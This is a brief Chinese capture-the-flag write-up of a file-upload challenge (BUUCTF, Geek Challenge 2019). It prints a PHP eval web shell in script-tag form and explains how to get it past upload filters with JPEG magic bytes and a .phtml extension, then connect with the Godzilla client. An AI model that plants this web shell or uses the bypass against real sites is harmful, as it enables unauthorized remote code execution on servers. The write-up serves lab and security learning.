BUU_[极客大挑战 2019]Upload 1

前期测试

经过测试
Pasted image 20240806201017.png
此题

简单攻击流程

因为不能出现<?,所以我们上传文件内容可以考虑采用js+ php方案

<script language='php'>@eval($_POST["pass"]);</script>

记得添加上文件头标志FFD8FF
Pasted image 20240806201425.png

准备上传
Pasted image 20240806201513.png

抓包,修改文件后缀为.phtml
Pasted image 20240806201633.png
Pasted image 20240806201647.png

常见可解析为php的文件后缀

哥斯拉测试连接通过
Pasted image 20240806201818.png

获得flag
Pasted image 20240806201847.png